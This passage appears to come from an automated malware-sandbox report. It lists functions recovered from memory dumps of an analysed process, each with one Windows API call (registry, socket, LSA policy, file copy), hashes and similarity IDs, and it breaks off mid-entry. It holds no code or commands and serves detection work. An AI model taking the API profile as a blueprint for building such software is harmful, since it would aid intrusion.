                                                                                              • Opcode ID: 027288246331705e28fcf3ab7c147f2ad53cb9c09d8b585089ffeee1df7ffcfe
                                                                                              • Instruction ID: 1fff5bf80e4a2917c5588743186038eb06370d16051b1b878f512af69de1e5c3
                                                                                              • Opcode Fuzzy Hash: 027288246331705e28fcf3ab7c147f2ad53cb9c09d8b585089ffeee1df7ffcfe
                                                                                              • Instruction Fuzzy Hash: 93319FB1509380AFE712DF65CC84B56FFE8EF05214F0884AAE9848B292D364E808CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD347E, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(?,00000E80), ref: 04BD3523
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getaddrinfo
                                                                                              • String ID:
                                                                                              • API String ID: 300660673-0
                                                                                              • Opcode ID: 61ea9e56f2d1db831e9abce2332a6e3656d176233054a6024b97f3c42cef76ec
                                                                                              • Instruction ID: 9af5d63babea02a0f39379083ca317a31ebdd9f0bb52cf3af41bac65c9ad34f6
                                                                                              • Opcode Fuzzy Hash: 61ea9e56f2d1db831e9abce2332a6e3656d176233054a6024b97f3c42cef76ec
                                                                                              • Instruction Fuzzy Hash: 7521C7B1500204AFFB21DF65DC85FA6FBECEF04710F1488AAFE459A181E675B5448BB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD1491, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 04BD153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              • Opcode ID: cec888631d25f8a837eed8fccf9eb594fc63eb660e368b9e7571781779855e3f
                                                                                              • Instruction ID: bdd96e37c792e84c467a9ef47a077246316ecfb4493622e3c088475bc4a8ce00
                                                                                              • Opcode Fuzzy Hash: cec888631d25f8a837eed8fccf9eb594fc63eb660e368b9e7571781779855e3f
                                                                                              • Instruction Fuzzy Hash: EF318F725093C06FD3138B25DC55B62BFB8EF47610F0A85DBE8848F593D265A909C7B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD390C, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenCurrentUser.KERNEL32(?,00000E80), ref: 04BD39A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CurrentOpenUser
                                                                                              • String ID:
                                                                                              • API String ID: 1571386571-0
                                                                                              • Opcode ID: 541f1ab8bd11d7e04236390f4d6e703b50797173ecfbe887033ef087b8922e28
                                                                                              • Instruction ID: 39d607b6d79fd776a6951a9da3ac10eadf4aa29c8dfe4e102838eda4cb96dda3
                                                                                              • Opcode Fuzzy Hash: 541f1ab8bd11d7e04236390f4d6e703b50797173ecfbe887033ef087b8922e28
                                                                                              • Instruction Fuzzy Hash: 4021A3B54093846FEB128B65DC85F66BFB8EF06310F1884EBED849F153D264A909C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD51CD, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • K32GetModuleInformation.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD525E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationModule
                                                                                              • String ID:
                                                                                              • API String ID: 3425974696-0
                                                                                              • Opcode ID: 8002f79bb48c602484f20e4a7f24781e7b57ae313bc856ccb45d5481afe80087
                                                                                              • Instruction ID: 703f9c6d48d72d908f214e542db2637767534dfb08e8b851d8fe71eab97814e9
                                                                                              • Opcode Fuzzy Hash: 8002f79bb48c602484f20e4a7f24781e7b57ae313bc856ccb45d5481afe80087
                                                                                              • Instruction Fuzzy Hash: 6421B4B15053806FEB228F65DC44F56BFB8EF45210F0884EAE945DB152D364E908CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD52C4, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 04BD536A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 514040917-0
                                                                                              • Opcode ID: 19c555d94a41bbb0df340935199a4e5917eec9f969a8f752347152210cce0df5
                                                                                              • Instruction ID: f6087d096ff7a571c73f6fcda1c389c8200ca468d9b872894269d4610a76bed4
                                                                                              • Opcode Fuzzy Hash: 19c555d94a41bbb0df340935199a4e5917eec9f969a8f752347152210cce0df5
                                                                                              • Instruction Fuzzy Hash: FA21BF725093C06FD712CB65CC55B66BFB4EF87610F0984DBE8848F1A3D624A909C7B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD59F0, Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegSetValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD5A90
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: 82c48cabc23bfa909e417d7e450acc88f703fb3653e451418c543585e8b6280b
                                                                                              • Instruction ID: beeb4ab24d9491554e6d9d85cca8465f5da4fbc3570f7c87bf55d44a5068789c
                                                                                              • Opcode Fuzzy Hash: 82c48cabc23bfa909e417d7e450acc88f703fb3653e451418c543585e8b6280b
                                                                                              • Instruction Fuzzy Hash: 6221A3B65093806FE7228F15DC80F53BFB8EF06310F0884DAE985DB252D264E849C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACA266, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • gethostname.WS2_32(?,00000E80,?,?), ref: 00ACA2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: gethostname
                                                                                              • String ID:
                                                                                              • API String ID: 144339138-0
                                                                                              • Opcode ID: 0104263df68372675dd5a171e5e84f114ba19ee0965d6575612b608c25c75bfb
                                                                                              • Instruction ID: 3b4f6f95d061c51a201bf41191193ca861670c0724ac12cc225a5b474bb73651
                                                                                              • Opcode Fuzzy Hash: 0104263df68372675dd5a171e5e84f114ba19ee0965d6575612b608c25c75bfb
                                                                                              • Instruction Fuzzy Hash: 3F21B57140D7C06FD7028B658C55B62BFB4EF47620F0985DBE9848F193D229A819CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD12EB, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              • Opcode ID: c5ff2d1ee868a7c211c2025500b00b4f87c4e7e5424b85cb87d5fa76a4b41122
                                                                                              • Instruction ID: e7e751dbc0752686861f28d19d78519a377517a49b575b0dd84270228f739e6d
                                                                                              • Opcode Fuzzy Hash: c5ff2d1ee868a7c211c2025500b00b4f87c4e7e5424b85cb87d5fa76a4b41122
                                                                                              • Instruction Fuzzy Hash: 3D2151B14093846FEB128B65DC84F96BFB8EF46210F0884EBEA85DB152D664A509C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD325D, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetAdaptersAddresses.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD32F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: AdaptersAddresses
                                                                                              • String ID:
                                                                                              • API String ID: 2506852604-0
                                                                                              • Opcode ID: 3b744bfb1607f83947ce1d88bccf4aed3417f7eb6ccdd356fd40ee0584dded9f
                                                                                              • Instruction ID: b4c194133dba9ba388dfdddc12dfbebc631efc219df6e8704b685c7a3196d0ba
                                                                                              • Opcode Fuzzy Hash: 3b744bfb1607f83947ce1d88bccf4aed3417f7eb6ccdd356fd40ee0584dded9f
                                                                                              • Instruction Fuzzy Hash: 9B2182754093806FDB228F159C84F56BFB8EF06320F0885DAE9848E153D365A849D772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACBE54, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 00ACBEE9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: 2b53366069326ef1ba119ca02a861516cf3f73045d2e31035327e06af8331cd1
                                                                                              • Instruction ID: c1b9d3a4650c9d1a5eec7ca27ab56c28b8cf7bc5696af383f88d613500bcc378
                                                                                              • Opcode Fuzzy Hash: 2b53366069326ef1ba119ca02a861516cf3f73045d2e31035327e06af8331cd1
                                                                                              • Instruction Fuzzy Hash: 8A210AB54087846FE7128B25DC41FA3BFB8EF42720F0984DAE9849F153D324A909D771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3A32, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3AB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 0516f9d8953de22eac46ff0c34985dbc0ad1bd360e876d9645ee1fcfb8e5e482
                                                                                              • Instruction ID: 49e09fae7fba4f390e998d33ee92665c88da7b817cb4bd0e1837622d8b80a5ae
                                                                                              • Opcode Fuzzy Hash: 0516f9d8953de22eac46ff0c34985dbc0ad1bd360e876d9645ee1fcfb8e5e482
                                                                                              • Instruction Fuzzy Hash: 042153B2500204AEEB21DF55DC85FABBBECEF04710F1489AAED45DB142E674E5058B71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD05BA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenFileMappingW.KERNELBASE(?,?), ref: 04BD0645
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileMappingOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1680863896-0
                                                                                              • Opcode ID: 18e50d72c80c193f1a38526c129f63144ab81c8b83c93c47febb92784a7d0d56
                                                                                              • Instruction ID: c29d04dfd75542c461a3915d05de55518244c6e80c47243453a3546b7a488f58
                                                                                              • Opcode Fuzzy Hash: 18e50d72c80c193f1a38526c129f63144ab81c8b83c93c47febb92784a7d0d56
                                                                                              • Instruction Fuzzy Hash: 9721BFB1509380AFEB22CF25DC44F66FFE8EF05210F0884AAE9849B242E375A408C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3B1F, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3BB0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ChangeNotifyValue
                                                                                              • String ID:
                                                                                              • API String ID: 3933585183-0
                                                                                              • Opcode ID: 7c135972888f46c7cffcb69e41a5a35ae68e750970451701e92aeee53b62ff1c
                                                                                              • Instruction ID: fd30d15b070184b526aedb2c2f363bde9ef725bdb8b643dec7d04d26977ad78d
                                                                                              • Opcode Fuzzy Hash: 7c135972888f46c7cffcb69e41a5a35ae68e750970451701e92aeee53b62ff1c
                                                                                              • Instruction Fuzzy Hash: E1218371409384AFDB228F55DC85F97BFBCEF05210F08889AE9859B152D725A548C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB95E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSASocketW.WS2_32(?,?,?,?,?), ref: 00ACB9EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Socket
                                                                                              • String ID:
                                                                                              • API String ID: 38366605-0
                                                                                              • Opcode ID: 6935fb6cfad29e0f9e75fed7a1a10bf6c0de846caec1b1d450c4ddd05b89d99c
                                                                                              • Instruction ID: b74d78a6f4c72302bb7d16b049ff8b4df78656855cb82c4147e80418c50fbe23
                                                                                              • Opcode Fuzzy Hash: 6935fb6cfad29e0f9e75fed7a1a10bf6c0de846caec1b1d450c4ddd05b89d99c
                                                                                              • Instruction Fuzzy Hash: AD215C71509780AFEB22CF65DC45F56FFF8EF05310F0884AEE9859B692D365A408CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD30A4, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetNetworkParams.IPHLPAPI(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3138
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: NetworkParams
                                                                                              • String ID:
                                                                                              • API String ID: 2134775280-0
                                                                                              • Opcode ID: dadff4bd2b2a6cb39776d3b809798fdfc3c5e2b1d290f68f1a49562fe58ecaf6
                                                                                              • Instruction ID: be7981c9e94f368bc750931d8d695d7b2d4a4a61d8e027a4f6a234cfb61fc5cc
                                                                                              • Opcode Fuzzy Hash: dadff4bd2b2a6cb39776d3b809798fdfc3c5e2b1d290f68f1a49562fe58ecaf6
                                                                                              • Instruction Fuzzy Hash: 8721F8714093846FEB138B65CC85F52BFB8EF47320F0884DAEA849F153D664A849CB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACBD7E, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00ACBDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 0f2a3aae71d326898c195d5a36de885d6dfa4e4a4cf91d994c1d821e7eab518e
                                                                                              • Instruction ID: d48015d1c5e77800dfc6e104fea432ae81b0a0c33a61084d2730ff955500093e
                                                                                              • Opcode Fuzzy Hash: 0f2a3aae71d326898c195d5a36de885d6dfa4e4a4cf91d994c1d821e7eab518e
                                                                                              • Instruction Fuzzy Hash: 2E219071500240AFEB21DF65DC85FA6FBE8EF08710F14886DEA858B252D772E804CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD5010, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CopyFileW.KERNEL32(?,?,?,DBA9D0AD,00000000,?,?,?,?,?,?,?,?,72B13C38), ref: 04BD5092
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CopyFile
                                                                                              • String ID:
                                                                                              • API String ID: 1304948518-0
                                                                                              • Opcode ID: 96f002290c92bcb62017ce3c2bbb4c4e1960233d86e57e1f9ccebbabbb335d39
                                                                                              • Instruction ID: 484e966be1a3bd5b144f2c7fb18b8cdfd3e583621d9b43a46c68d6ed2803b170
                                                                                              • Opcode Fuzzy Hash: 96f002290c92bcb62017ce3c2bbb4c4e1960233d86e57e1f9ccebbabbb335d39
                                                                                              • Instruction Fuzzy Hash: ED2151725093805FDB22CF25DC45B92BFE8EF06210F0984EAE985CF263E264A548C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD50ED, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • K32EnumProcessModules.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD516E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EnumModulesProcess
                                                                                              • String ID:
                                                                                              • API String ID: 1082081703-0
                                                                                              • Opcode ID: fa4f6c464e9b8fce20092ffa13acbc3bb64064daf3403cff7df6f45d7220d5af
                                                                                              • Instruction ID: d648b4e93fa724429a45f35a3d0ddee3f0b9e8e81cad26c220142433915213ff
                                                                                              • Opcode Fuzzy Hash: fa4f6c464e9b8fce20092ffa13acbc3bb64064daf3403cff7df6f45d7220d5af
                                                                                              • Instruction Fuzzy Hash: 7C21C5B15093806FEB22CF65DC85F56BFB8EF05310F0884AAF985DB152D364A448C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD031E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNEL32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD03B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 7dde73fb2e391bc92a5389a6aa82c6d48126ae70485f1489031f680c68f8940f
                                                                                              • Instruction ID: fd8747d16f324a50db79573900dffafc64c8d4673afdad984f3921adfd34f4b2
                                                                                              • Opcode Fuzzy Hash: 7dde73fb2e391bc92a5389a6aa82c6d48126ae70485f1489031f680c68f8940f
                                                                                              • Instruction Fuzzy Hash: A8218C72508344AFEB21CF55DC84F57BBB8EF09220F08859AEA859B252E364E448CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACABD2, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 00ACAC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 6134726bb12718c6a687d7d3679bd7c07dafe310e659c484860742709d350f93
                                                                                              • Instruction ID: bce8def9bd34b8403f09f4dc651d15fbc3061414eb6131d2e8dcc7e014b0d098
                                                                                              • Opcode Fuzzy Hash: 6134726bb12718c6a687d7d3679bd7c07dafe310e659c484860742709d350f93
                                                                                              • Instruction Fuzzy Hash: 2721A4B2504208AFEB219F59DC85FABFBECEF14310F14845AEA459B241D634E9088BB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD102D, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • getsockname.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD10B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: getsockname
                                                                                              • String ID:
                                                                                              • API String ID: 3358416759-0
                                                                                              • Opcode ID: 5a99bd701b11994eaafc46641c3553c3098be261593e5204d2174098ea8586c5
                                                                                              • Instruction ID: d337f0d69d59f17576f41b0bd65d8e67c67451180eecfa33ebfb4fce5880d6f5
                                                                                              • Opcode Fuzzy Hash: 5a99bd701b11994eaafc46641c3553c3098be261593e5204d2174098ea8586c5
                                                                                              • Instruction Fuzzy Hash: D3217FB15093846FEB22CF65DC84F96BFA8EF45210F0884EAEA849B152D764A548CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD00E2, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • setsockopt.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD0161
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: setsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3981526788-0
                                                                                              • Opcode ID: 9a18b218ad16b60aa6ce7c45f20e995c143d8fa13db28312fcb9048f7b7ffa63
                                                                                              • Instruction ID: 99f2bb829c68d121c816b192c10f5ee7109817bf16afcb57bafb2136e0ab3468
                                                                                              • Opcode Fuzzy Hash: 9a18b218ad16b60aa6ce7c45f20e995c143d8fa13db28312fcb9048f7b7ffa63
                                                                                              • Instruction Fuzzy Hash: 9A21F3B2404340AFEB228F55DC84FA7BFBCEF45320F0484AAFA849B152D274A409CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3C32, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(?,00000E80), ref: 04BD3CA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: a7514f05946fcb422e49c40c8cdb985e97c711782b4d3635bf0eae09a1109112
                                                                                              • Instruction ID: afcac2917286cb0d637d3cb9549999a59bef3454beadf9a227df2a9819082fd9
                                                                                              • Opcode Fuzzy Hash: a7514f05946fcb422e49c40c8cdb985e97c711782b4d3635bf0eae09a1109112
                                                                                              • Instruction Fuzzy Hash: 302193B1500304AFEB219F55DC85F6AFBE8EF04710F1888AAED459B242E675F5148B72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00ACB44E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00ACB4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.385083511.0000000000ACA000.00000040.00000001.sdmp, Offset: 00ACA000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              • Opcode ID: 6359e9fff57db2257f120a74472150c9f49938b2e34bec79c44d6fd5afe8eb45
                                                                                              • Instruction ID: 419aa1eb62472e50dd8e7395be438d799f0898cf7ba9c713c3e9e5548f4b768f
                                                                                              • Opcode Fuzzy Hash: 6359e9fff57db2257f120a74472150c9f49938b2e34bec79c44d6fd5afe8eb45
                                                                                              • Instruction Fuzzy Hash: 6321C072500204AFEB20DF69DC85F6AFBE8EF04320F14886AED459B242D765E9088B71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD3696, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAIoctl.WS2_32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD3711
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Ioctl
                                                                                              • String ID:
                                                                                              • API String ID: 3041054344-0
                                                                                              • Opcode ID: c106206b726d792f9565d04826dc12f4d114cac8ce4dcb3b4c812373d28dc933
                                                                                              • Instruction ID: 1bb3950398e13bc29716ca68cb5ce26506a52ee358595469a3d264d0b96a3598
                                                                                              • Opcode Fuzzy Hash: c106206b726d792f9565d04826dc12f4d114cac8ce4dcb3b4c812373d28dc933
                                                                                              • Instruction Fuzzy Hash: F7217CB5500604AFEB218F55DC84FA6FBE8EF04710F0494AAEE458B252E771F408DB72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD0A56, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMutexW.KERNEL32(?,?), ref: 04BD0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              • Opcode ID: 19848bfb2835078d29ce8a77cd1f4d26f8a2dba89eeb12522e8ae4b13eeef536
                                                                                              • Instruction ID: 21998ff54538df4002b1764b8411f8ce1f7013930dc51022ce174c1553e8167a
                                                                                              • Opcode Fuzzy Hash: 19848bfb2835078d29ce8a77cd1f4d26f8a2dba89eeb12522e8ae4b13eeef536
                                                                                              • Instruction Fuzzy Hash: E2219F71604244AFEB21EF69DC85B66FBE8EF04314F0484AAE9498B282E771F405CB75
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 04BD69DA, Relevance: 1.6, APIs: 1, Instructions: 72encryptionCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,DBA9D0AD,00000000,00000000,00000000,00000000), ref: 04BD6A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.389533719.0000000004BD0000.00000040.00000001.sdmp, Offset: 04BD0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CertCertificateChainPolicyVerify
                                                                                              • String ID:
                                                                                              • API String ID: 3930008701-0
                                                                                              • Opcode ID: eba254f80d5f5aab8ec2ad1ba69aa70e6920228c92b6ed8014878540aa073a35
                                                                                              • Instruction ID: 904150a3c76b765b85e071ef5679a31aacd6a4dc3bd317d3e58fc8e2c1d4a6d3
                                                                                              • Opcode Fuzzy Hash: eba254f80d5f5aab8ec2ad1ba69aa70e6920228c92b6ed8014878540aa073a35
